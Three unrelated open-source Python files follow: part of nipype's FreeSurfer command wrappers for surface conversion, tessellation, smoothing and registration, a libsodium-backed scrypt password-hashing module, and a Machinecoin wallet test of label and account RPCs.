outputs.orientation = self.info_regexp(info, "Orientation")
outputs.ph_enc_dir = self.info_regexp(info, "PhEncDir")
# File format and datatype are both keyed by "type"
ftype, dtype = re.findall("%s\s*:\s+(.+?)\n" % "type", info)
outputs.file_format = ftype
outputs.data_type = dtype
return outputs
class MRIsConvertInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
"""
annot_file = File(exists=True, argstr="--annot %s",
desc="input is annotation or gifti label data")
parcstats_file = File(exists=True, argstr="--parcstats %s",
desc="infile is name of text file containing label/val pairs")
label_file = File(exists=True, argstr="--label %s",
desc="infile is .label file, label is name of this label")
scalarcurv_file = File(exists=True, argstr="-c %s",
desc="input is scalar curv overlay file (must still specify surface)")
functional_file = File(exists=True, argstr="-f %s",
desc="input is functional time-series or other multi-frame data (must specify surface)")
labelstats_outfile = File(exists=False, argstr="--labelstats %s",
desc="outfile is name of gifti file to which label stats will be written")
patch = traits.Bool(argstr="-p", desc="input is a patch, not a full surface")
rescale = traits.Bool(argstr="-r", desc="rescale vertex xyz so total area is same as group average")
normal = traits.Bool(argstr="-n", desc="output is an ascii file where vertex data")
xyz_ascii = traits.Bool(argstr="-a", desc="Print only surface xyz to ascii file")
vertex = traits.Bool(argstr="-v", desc="Writes out neighbors of a vertex in each row")
scale = traits.Float(argstr="-s %.3f", desc="scale vertex xyz by scale")
dataarray_num = traits.Int(argstr="--da_num %d", desc="if input is gifti, 'num' specifies which data array to use")
talairachxfm_subjid = traits.String(argstr="-t %s", desc="apply talairach xfm of subject to vertex xyz")
origname = traits.String(argstr="-o %s", desc="read orig positions")
in_file = File(exists=True, mandatory=True, position=-2, argstr='%s', desc='File to read/convert')
out_file = File(argstr='./%s', position=-1, genfile=True, desc='output filename or True to generate one')
#Not really sure why the ./ is necessary but the module fails without it
out_datatype = traits.Enum("ico", "tri", "stl", "vtk", "gii", "mgh", "mgz", mandatory=True,
desc="These file formats are supported: ASCII: .asc" \
"ICO: .ico, .tri GEO: .geo STL: .stl VTK: .vtk GIFTI: .gii MGH surface-encoded 'volume': .mgh, .mgz")
class MRIsConvertOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
"""
converted = File(exists=True, desc='converted output surface')
class MRIsConvert(FSCommand):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> mris = fs.MRIsConvert()
>>> mris.inputs.in_file = 'lh.pial'
>>> mris.inputs.out_datatype = 'gii'
>>> mris.run() # doctest: +SKIP
"""
_cmd = 'mris_convert'
input_spec = MRIsConvertInputSpec
output_spec = MRIsConvertOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["converted"] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.annot_file):
_, name, ext = split_filename(self.inputs.annot_file)
elif isdefined(self.inputs.parcstats_file):
_, name, ext = split_filename(self.inputs.parcstats_file)
elif isdefined(self.inputs.label_file):
_, name, ext = split_filename(self.inputs.label_file)
elif isdefined(self.inputs.scalarcurv_file):
_, name, ext = split_filename(self.inputs.scalarcurv_file)
elif isdefined(self.inputs.functional_file):
_, name, ext = split_filename(self.inputs.functional_file)
elif isdefined(self.inputs.in_file):
_, name, ext = split_filename(self.inputs.in_file)
return name + ext + "_converted." + self.inputs.out_datatype
class MRITessellateInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
"""
in_file = File(exists=True, mandatory=True, position=-3, argstr='%s', desc='Input volume to tesselate voxels from.')
label_value = traits.Int(position=-2, argstr='%d', mandatory=True,
desc='Label value which to tesselate from the input volume. (integer, if input is "filled.mgz" volume, 127 is rh, 255 is lh)')
out_file = File(argstr='./%s', position=-1, genfile=True, desc='output filename or True to generate one')
tesselate_all_voxels = traits.Bool(argstr='-a', desc='Tessellate the surface of all voxels with different labels')
use_real_RAS_coordinates = traits.Bool(argstr='-n', desc='Saves surface with real RAS coordinates where c_(r,a,s) != 0')
class MRITessellateOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
"""
surface = File(exists=True, desc='binary surface of the tessellation ')
class MRITessellate(FSCommand):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> tess = fs.MRITessellate()
>>> tess.inputs.in_file = 'aseg.mgz'
>>> tess.inputs.label_value = 17
>>> tess.inputs.out_file = 'lh.hippocampus'
>>> tess.run() # doctest: +SKIP
"""
_cmd = 'mri_tessellate'
input_spec = MRITessellateInputSpec
output_spec = MRITessellateOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return self.inputs.out_file
else:
_, name, ext = split_filename(self.inputs.in_file)
return name + ext + '_' + str(self.inputs.label_value)
class MRIPretessInputSpec(FSTraitedSpec):
in_filled = File(exists=True, mandatory=True, position=-4, argstr='%s',
desc=('filled volume, usually wm.mgz'))
label = traits.Either(traits.Str('wm'), traits.Int(1), argstr='%s', default='wm',
mandatory=True, usedefault=True, position=-3,
desc=('label to be picked up, can be a Freesurfer\'s string like '
'\'wm\' or a label value (e.g. 127 for rh or 255 for lh)'))
in_norm = File(exists=True, mandatory=True, position=-2, argstr='%s',
desc=('the normalized, brain-extracted T1w image. Usually norm.mgz'))
out_file = File(position=-1, argstr='%s', genfile=True,
desc=('the output file after mri_pretess.'))
nocorners = traits.Bool(False, argstr='-nocorners', desc=('do not remove corner configurations'
' in addition to edge ones.'))
keep = traits.Bool(False, argstr='-keep', desc=('keep WM edits'))
test = traits.Bool(False, argstr='-test', desc=('adds a voxel that should be removed by '
'mri_pretess. The value of the voxel is set to that of an ON-edited WM, '
'so it should be kept with -keep. The output will NOT be saved.'))
class MRIPretessOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='output file after mri_pretess')
class MRIPretess(FSCommand):
"""
Uses Freesurfer's mri_pretess to prepare volumes to be tessellated.
Description
-----------
Changes white matter (WM) segmentation so that the neighbors of all
voxels labeled as WM have a face in common - no edges or corners
allowed.
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> pretess = fs.MRIPretess()
>>> pretess.inputs.in_filled = 'wm.mgz'
>>> pretess.inputs.in_norm = 'norm.mgz'
>>> pretess.inputs.nocorners = True
>>> pretess.cmdline
'mri_pretess -nocorners wm.mgz wm norm.mgz wm_pretesswm.mgz'
>>> pretess.run() # doctest: +SKIP
"""
_cmd = 'mri_pretess'
input_spec = MRIPretessInputSpec
output_spec = MRIPretessOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['out_file'] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return self.inputs.out_file
else:
_, name, ext = split_filename(self.inputs.in_filled)
return name + '_pretess' + str(self.inputs.label) + ext
class MRIMarchingCubesInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
"""
in_file = File(exists=True, mandatory=True, position=1, argstr='%s', desc='Input volume to tesselate voxels from.')
label_value = traits.Int(position=2, argstr='%d', mandatory=True,
desc='Label value which to tesselate from the input volume. (integer, if input is "filled.mgz" volume, 127 is rh, 255 is lh)')
connectivity_value = traits.Int(1, position=-1, argstr='%d', usedefault=True,
desc='Alter the marching cubes connectivity: 1=6+,2=18,3=6,4=26 (default=1)')
out_file = File(argstr='./%s', position=-2, genfile=True, desc='output filename or True to generate one')
class MRIMarchingCubesOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
"""
surface = File(exists=True, desc='binary surface of the tessellation ')
class MRIMarchingCubes(FSCommand):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> mc = fs.MRIMarchingCubes()
>>> mc.inputs.in_file = 'aseg.mgz'
>>> mc.inputs.label_value = 17
>>> mc.inputs.out_file = 'lh.hippocampus'
>>> mc.run() # doctest: +SKIP
"""
_cmd = 'mri_mc'
input_spec = MRIMarchingCubesInputSpec
output_spec = MRIMarchingCubesOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = self._gen_outfilename()
return outputs
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + ext + '_' + str(self.inputs.label_value))
class SmoothTessellationInputSpec(FSTraitedSpec):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
"""
in_file = File(exists=True, mandatory=True, argstr='%s', position=1, desc='Input volume to tesselate voxels from.')
curvature_averaging_iterations = traits.Int(10, usedefault=True, argstr='-a %d', position=-1, desc='Number of curvature averaging iterations (default=10)')
smoothing_iterations = traits.Int(10, usedefault=True, argstr='-n %d', position=-2, desc='Number of smoothing iterations (default=10)')
snapshot_writing_iterations = traits.Int(argstr='-w %d', desc='Write snapshot every "n" iterations')
use_gaussian_curvature_smoothing = traits.Bool(argstr='-g', position=3, desc='Use Gaussian curvature smoothing')
gaussian_curvature_norm_steps = traits.Int(argstr='%d ', position=4, desc='Use Gaussian curvature smoothing')
gaussian_curvature_smoothing_steps = traits.Int(argstr='%d', position=5, desc='Use Gaussian curvature smoothing')
disable_estimates = traits.Bool(argstr='-nw', desc='Disables the writing of curvature and area estimates')
normalize_area = traits.Bool(argstr='-area', desc='Normalizes the area after smoothing')
use_momentum = traits.Bool(argstr='-m', desc='Uses momentum')
out_file = File(argstr='%s', position=2, genfile=True, desc='output filename or True to generate one')
out_curvature_file = File(argstr='-c %s', desc='Write curvature to ?h.curvname (default "curv")')
out_area_file = File(argstr='-b %s', desc='Write area to ?h.areaname (default "area")')
class SmoothTessellationOutputSpec(TraitedSpec):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
"""
surface = File(exists=True, desc='Smoothed surface file ')
class SmoothTessellation(FSCommand):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
.. seealso::
SurfaceSmooth() Interface
For smoothing a scalar field along a surface manifold
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> smooth = fs.SmoothTessellation()
>>> smooth.inputs.in_file = 'lh.hippocampus.stl'
>>> smooth.run() # doctest: +SKIP
"""
_cmd = 'mris_smooth'
input_spec = SmoothTessellationInputSpec
output_spec = SmoothTessellationOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = self._gen_outfilename()
return outputs
def _gen_filename(self, name):
if name is 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + '_smoothed' + ext)
def _run_interface(self, runtime):
# The returncode is meaningless in BET. So check the output
# in stderr and if it's set, then update the returncode
# accordingly.
runtime = super(SmoothTessellation, self)._run_interface(runtime)
if "failed" in runtime.stderr:
self.raise_exception(runtime)
return runtime
class MakeAverageSubjectInputSpec(FSTraitedSpec):
subjects_ids = traits.List(traits.Str(), argstr='--subjects %s',
desc='freesurfer subjects ids to average',
mandatory=True, sep=' ')
out_name = File('average', argstr='--out %s',
desc='name for the average subject', usedefault=True)
class MakeAverageSubjectOutputSpec(TraitedSpec):
average_subject_name = traits.Str(desc='Output registration file')
class MakeAverageSubject(FSCommand):
"""Make an average freesurfer subject
Examples
--------
>>> from nipype.interfaces.freesurfer import MakeAverageSubject
>>> avg = MakeAverageSubject(subjects_ids=['s1', 's2'])
>>> avg.cmdline
'make_average_subject --out average --subjects s1 s2'
"""
_cmd = 'make_average_subject'
input_spec = MakeAverageSubjectInputSpec
output_spec = MakeAverageSubjectOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['average_subject_name'] = self.inputs.out_name
return outputs
class ExtractMainComponentInputSpec(CommandLineInputSpec):
in_file = File(exists=True, mandatory=True, argstr='%s', position=1,
desc='input surface file')
out_file = File(name_template='%s.maincmp', name_source='in_file',
argstr='%s', position=2,
desc='surface containing main component')
class ExtractMainComponentOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='surface containing main component')
class ExtractMainComponent(CommandLine):
"""Extract the main component of a tesselated surface
Examples
--------
>>> from nipype.interfaces.freesurfer import ExtractMainComponent
>>> mcmp = ExtractMainComponent(in_file='lh.pial')
>>> mcmp.cmdline
'mris_extract_main_component lh.pial lh.maincmp'
"""
_cmd='mris_extract_main_component'
input_spec=ExtractMainComponentInputSpec
output_spec=ExtractMainComponentOutputSpec
class Tkregister2InputSpec(FSTraitedSpec):
target_image = File(exists=True, argstr="--targ %s",
xor=['fstarg'],
desc='target volume')
fstarg = traits.Bool(False, argstr='--fstarg',
xor=['target_image'],
desc='use subject\'s T1 as reference')
moving_image = File(exists=True, mandatory=True, argstr="--mov %s",
desc='moving volume')
fsl_in_matrix = File(exists=True, argstr="--fsl %s",
desc='fsl-style registration input matrix')
subject_id = traits.String(argstr="--s %s",
desc='freesurfer subject ID')
noedit = traits.Bool(True, argstr="--noedit", usedefault=True,
desc='do not open edit window (exit)')
reg_file = File('register.dat', usedefault=True,
mandatory=True, argstr='--reg %s',
desc='freesurfer-style registration file')
reg_header = traits.Bool(False, argstr='--regheader',
desc='compute regstration from headers')
fstal = traits.Bool(False, argstr='--fstal',
xor=['target_image', 'moving_image'],
desc='set mov to be tal and reg to be tal xfm')
movscale = traits.Float(argstr='--movscale %f',
desc='adjust registration matrix to scale mov')
xfm = File(exists=True, argstr='--xfm %s',
desc='use a matrix in MNI coordinates as initial registration')
fsl_out = File(argstr='--fslregout %s',
desc='compute an FSL-compatible resgitration matrix')
class Tkregister2OutputSpec(TraitedSpec):
reg_file = File(exists=True, desc='freesurfer-style registration file')
fsl_file = File(desc='FSL-style registration file')
class Tkregister2(FSCommand):
"""
Examples
--------
Get transform matrix between orig (*tkRAS*) and native (*scannerRAS*)
coordinates in Freesurfer. Implements the first step of mapping surfaces
to native space in `this guide
<http://surfer.nmr.mgh.harvard.edu/fswiki/FsAnat-to-NativeAnat>`_.
>>> from nipype.interfaces.freesurfer import Tkregister2
>>> tk2 = Tkregister2(reg_file='T1_to_native.dat')
>>> tk2.inputs.moving_image = 'T1.mgz'
>>> tk2.inputs.target_image = 'structural.nii'
>>> tk2.inputs.reg_header = True
>>> tk2.cmdline
'tkregister2 --mov T1.mgz --noedit --reg T1_to_native.dat --regheader \
--targ structural.nii'
>>> tk2.run() # doctest: +SKIP
The example below uses tkregister2 without the manual editing
stage to convert FSL-style registration matrix (.mat) to
FreeSurfer-style registration matrix (.dat)
>>> from nipype.interfaces.freesurfer import Tkregister2
>>> tk2 = Tkregister2()
>>> tk2.inputs.moving_image = 'epi.nii'
>>> tk2.inputs.fsl_in_matrix = 'flirt.mat'
>>> tk2.cmdline
'tkregister2 --fsl flirt.mat --mov epi.nii --noedit --reg register.dat'
>>> tk2.run() # doctest: +SKIP
"""
_cmd = "tkregister2"
input_spec = Tkregister2InputSpec
output_spec = Tkregister2OutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs['reg_file'] = os.path.abspath(self.inputs.reg_file)
if isdefined(self.inputs.fsl_out):
outputs['fsl_file'] = op.abspath(self.inputs.fsl_out)
return outputs
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + '_smoothed' + ext)
|
|
# Copyright (c) 2014-2021, Jan Varho
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Scrypt implementation that calls into system libsodium"""
import ctypes
from ctypes import c_char_p, c_size_t, c_uint64, c_uint32, c_void_p
from . import mcf as mcf_mod
from . import libsodium_load
from .common import (
SCRYPT_N, SCRYPT_r, SCRYPT_p, SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_s1,
SCRYPT_MCF_PREFIX_DEFAULT, SCRYPT_MCF_PREFIX_ANY, check_args)
from . import pypyscrypt_inline as scr_mod
_lib = libsodium_load.get_libsodium()
if _lib is None:
raise ImportError('Unable to load libsodium')
try:
_scrypt_ll = _lib.crypto_pwhash_scryptsalsa208sha256_ll
_scrypt_ll.argtypes = [
c_void_p, # passwd
c_size_t, # passwdlen
c_void_p, # salt
c_size_t, # saltlen
c_uint64, # N
c_uint32, # r
c_uint32, # p
c_void_p, # buf
c_size_t, # buflen
]
except AttributeError:
_scrypt_ll = None
try:
_scrypt = _lib.crypto_pwhash_scryptsalsa208sha256
_scrypt_str = _lib.crypto_pwhash_scryptsalsa208sha256_str
_scrypt_str_chk = _lib.crypto_pwhash_scryptsalsa208sha256_str_verify
_scrypt_str_bytes = _lib.crypto_pwhash_scryptsalsa208sha256_strbytes()
_scrypt_salt = _lib.crypto_pwhash_scryptsalsa208sha256_saltbytes()
if _scrypt_str_bytes != 102 and not _scrypt_ll:
raise ImportError('Incompatible libsodium')
except AttributeError:
try:
_scrypt = _lib.crypto_pwhash_scryptxsalsa208sha256
_scrypt_str = _lib.crypto_pwhash_scryptxsalsa208sha256_str
_scrypt_str_chk = _lib.crypto_pwhash_scryptxsalsa208sha256_str_verify
_scrypt_str_bytes = _lib.crypto_pwhash_scryptxsalsa208sha256_strbytes()
_scrypt_salt = _lib.crypto_pwhash_scryptxsalsa208sha256_saltbytes
_scrypt_salt = _scrypt_salt()
if _scrypt_str_bytes != 102 and not _scrypt_ll:
raise ImportError('Incompatible libsodium')
except AttributeError:
if not _scrypt_ll:
raise ImportError('Incompatible libsodium')
_scrypt.argtypes = [
c_void_p, # out
c_uint64, # outlen
c_void_p, # passwd
c_uint64, # passwdlen
c_void_p, # salt
c_uint64, # opslimit
c_size_t, # memlimit
]
_scrypt_str.argtypes = [
c_void_p, # out (102 bytes)
c_void_p, # passwd
c_uint64, # passwdlen
c_uint64, # opslimit
c_size_t, # memlimit
]
_scrypt_str_chk.argtypes = [
c_char_p, # str (102 bytes)
c_void_p, # passwd
c_uint64, # passwdlen
]
def scrypt(password, salt, N=SCRYPT_N, r=SCRYPT_r, p=SCRYPT_p, olen=64):
"""Returns a key derived using the scrypt key-derivarion function
N must be a power of two larger than 1 but no larger than 2 ** 63 (insane)
r and p must be positive numbers such that r * p < 2 ** 30
The default values are:
N -- 2**14 (~16k)
r -- 8
p -- 1
Memory usage is proportional to N*r. Defaults require about 16 MiB.
Time taken is proportional to N*p. Defaults take <100ms of a recent x86.
The last one differs from libscrypt defaults, but matches the 'interactive'
work factor from the original paper. For long term storage where runtime of
key derivation is not a problem, you could use 16 as in libscrypt or better
yet increase N if memory is plentiful.
"""
check_args(password, salt, N, r, p, olen)
if _scrypt_ll:
out = ctypes.create_string_buffer(olen)
if _scrypt_ll(password, len(password), salt, len(salt),
N, r, p, out, olen):
raise ValueError
return out.raw
if len(salt) != _scrypt_salt or r != 8 or (p & (p - 1)) or (N*p <= 512):
return scr_mod.scrypt(password, salt, N, r, p, olen)
s = next(i for i in range(1, 64) if 2**i == N)
t = next(i for i in range(0, 30) if 2**i == p)
m = 2**(10 + s)
o = 2**(5 + t + s)
if s > 53 or t + s > 58:
raise ValueError
out = ctypes.create_string_buffer(olen)
if _scrypt(out, olen, password, len(password), salt, o, m) != 0:
raise ValueError
return out.raw
def scrypt_mcf(password, salt=None, N=SCRYPT_N, r=SCRYPT_r, p=SCRYPT_p,
prefix=SCRYPT_MCF_PREFIX_DEFAULT):
"""Derives a Modular Crypt Format hash using the scrypt KDF
Parameter space is smaller than for scrypt():
N must be a power of two larger than 1 but no larger than 2 ** 31
r and p must be positive numbers between 1 and 255
Salt must be a byte string 1-16 bytes long.
If no salt is given, a random salt of 128+ bits is used. (Recommended.)
"""
if isinstance(password, str):
password = password.encode('utf8')
elif not isinstance(password, bytes):
raise TypeError('password must be a unicode or byte string')
if N < 2 or (N & (N - 1)):
raise ValueError('scrypt N must be a power of 2 greater than 1')
if p > 255 or p < 1:
raise ValueError('scrypt_mcf p out of range [1,255]')
if N > 2**31:
raise ValueError('scrypt_mcf N out of range [2,2**31]')
if (salt is not None or r != 8 or (p & (p - 1)) or (N*p <= 512) or
prefix not in (SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_s1,
SCRYPT_MCF_PREFIX_ANY) or
_scrypt_ll):
return mcf_mod.scrypt_mcf(scrypt, password, salt, N, r, p, prefix)
s = next(i for i in range(1, 32) if 2**i == N)
t = next(i for i in range(0, 8) if 2**i == p)
m = 2**(10 + s)
o = 2**(5 + t + s)
mcf = ctypes.create_string_buffer(102)
if _scrypt_str(mcf, password, len(password), o, m) != 0:
return mcf_mod.scrypt_mcf(scrypt, password, salt, N, r, p, prefix)
if prefix in (SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_ANY):
return mcf.raw.strip(b'\0')
_N, _r, _p, salt, hash, _olen = mcf_mod._scrypt_mcf_decode_7(mcf.raw[:-1])
assert _N == N and _r == r and _p == p, (_N, _r, _p, N, r, p, o, m)
return mcf_mod._scrypt_mcf_encode_s1(N, r, p, salt, hash)
def scrypt_mcf_check(mcf, password):
"""Returns True if the password matches the given MCF hash"""
if isinstance(password, str):
password = password.encode('utf8')
elif not isinstance(password, bytes):
raise TypeError('password must be a unicode or byte string')
if not isinstance(mcf, bytes):
raise TypeError('MCF must be a byte string')
if mcf_mod._scrypt_mcf_7_is_standard(mcf) and not _scrypt_ll:
return _scrypt_str_chk(mcf, password, len(password)) == 0
return mcf_mod.scrypt_mcf_check(scrypt, mcf, password)
if __name__ == "__main__":
import sys
from . import tests
try:
from . import pylibscrypt
scr_mod = pylibscrypt
except ImportError:
pass
tests.run_scrypt_suite(sys.modules[__name__])
|
|
#!/usr/bin/env python3
# Copyright (c) 2016-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test label RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount/getaddressesbylabel
- listaddressgroupings
- setlabel
- sendfrom (with account arguments)
- move (with account arguments)
Run the test twice - once using the accounts API and once using the labels API.
The accounts API test can be removed in V0.18.
"""
from collections import defaultdict
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class WalletLabelsTest(MachinecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-deprecatedrpc=accounts'], []]
def setup_network(self):
"""Don't connect nodes."""
self.setup_nodes()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
"""Run the test twice - once using the accounts API and once using the labels API."""
self.log.info("Test accounts API")
self._run_subtest(True, self.nodes[0])
self.log.info("Test labels API")
self._run_subtest(False, self.nodes[1])
def _run_subtest(self, accounts_api, node):
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Machinecoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
assert_equal(address_group[0][1], 50)
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" label has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
if accounts_api:
node.sendfrom("", common_address, fee)
amount_to_send = 1.0
# Create labels and make sure subsequent label API calls
# recognize the label/address associations.
labels = [Label(name, accounts_api) for name in ("a", "b", "c", "d", "e")]
for label in labels:
if accounts_api:
address = node.getaccountaddress(label.name)
else:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
# Check all labels are returned by listlabels.
assert_equal(node.listlabels(), [label.name for label in labels])
# Send a transaction to each label, and make sure this forces
# getaccountaddress to generate a new receiving address.
for label in labels:
if accounts_api:
node.sendtoaddress(label.receive_address, amount_to_send)
label.add_receive_address(node.getaccountaddress(label.name))
else:
node.sendtoaddress(label.addresses[0], amount_to_send)
label.verify(node)
# Check the amounts received.
node.generate(1)
for label in labels:
assert_equal(
node.getreceivedbyaddress(label.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbylabel(label.name), amount_to_send)
# Check that sendfrom label reduces listaccounts balances.
for i, label in enumerate(labels):
to_label = labels[(i + 1) % len(labels)]
if accounts_api:
node.sendfrom(label.name, to_label.receive_address, amount_to_send)
else:
node.sendtoaddress(to_label.addresses[0], amount_to_send)
node.generate(1)
for label in labels:
if accounts_api:
address = node.getaccountaddress(label.name)
else:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
assert_equal(node.getreceivedbylabel(label.name), 2)
if accounts_api:
node.move(label.name, "", node.getbalance(label.name))
label.verify(node)
node.generate(101)
expected_account_balances = {"": 5200}
for label in labels:
expected_account_balances[label.name] = 0
if accounts_api:
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 5200)
# Check that setlabel can assign a label to a new unused address.
for label in labels:
address = node.getnewaddress()
node.setlabel(address, label.name)
label.add_address(address)
label.verify(node)
if accounts_api:
assert address not in node.getaddressesbyaccount("")
else:
assert_raises_rpc_error(-11, "No addresses with label", node.getaddressesbylabel, "")
# Check that addmultisigaddress can assign labels.
for label in labels:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, label.name)['address']
label.add_address(multisig_address)
label.purpose[multisig_address] = "send"
label.verify(node)
if accounts_api:
node.sendfrom("", multisig_address, 50)
node.generate(101)
if accounts_api:
for label in labels:
assert_equal(node.getbalance(label.name), 50)
# Check that setlabel can change the label of an address from a
# different label.
change_label(node, labels[0].addresses[0], labels[0], labels[1], accounts_api)
# Check that setlabel can set the label of an address already
# in the label. This is a no-op.
change_label(node, labels[2].addresses[0], labels[2], labels[2], accounts_api)
if accounts_api:
# Check that setaccount can change the label of an address which
# is the receiving address of a different label.
change_label(node, labels[0].receive_address, labels[0], labels[1], accounts_api)
# Check that setaccount can set the label of an address which is
# already the receiving address of the label. This is a no-op.
change_label(node, labels[2].receive_address, labels[2], labels[2], accounts_api)
class Label:
def __init__(self, name, accounts_api):
# Label name
self.name = name
self.accounts_api = accounts_api
# Current receiving address associated with this label.
self.receive_address = None
# List of all addresses assigned with this label
self.addresses = []
# Map of address to address purpose
self.purpose = defaultdict(lambda: "receive")
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
if self.accounts_api:
self.receive_address = address
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
if self.accounts_api:
assert_equal(node.getaccountaddress(self.name), self.receive_address)
for address in self.addresses:
assert_equal(
node.getaddressinfo(address)['labels'][0],
{"name": self.name,
"purpose": self.purpose[address]})
if self.accounts_api:
assert_equal(node.getaccount(address), self.name)
else:
assert_equal(node.getaddressinfo(address)['label'], self.name)
assert_equal(
node.getaddressesbylabel(self.name),
{address: {"purpose": self.purpose[address]} for address in self.addresses})
if self.accounts_api:
assert_equal(set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_label(node, address, old_label, new_label, accounts_api):
assert_equal(address in old_label.addresses, True)
if accounts_api:
node.setaccount(address, new_label.name)
else:
node.setlabel(address, new_label.name)
old_label.addresses.remove(address)
new_label.add_address(address)
# Calling setaccount on an address which was previously the receiving
# address of a different account should reset the receiving address of
# the old account, causing getaccountaddress to return a brand new
# address.
if accounts_api:
if old_label.name != new_label.name and address == old_label.receive_address:
new_address = node.getaccountaddress(old_label.name)
assert_equal(new_address not in old_label.addresses, True)
assert_equal(new_address not in new_label.addresses, True)
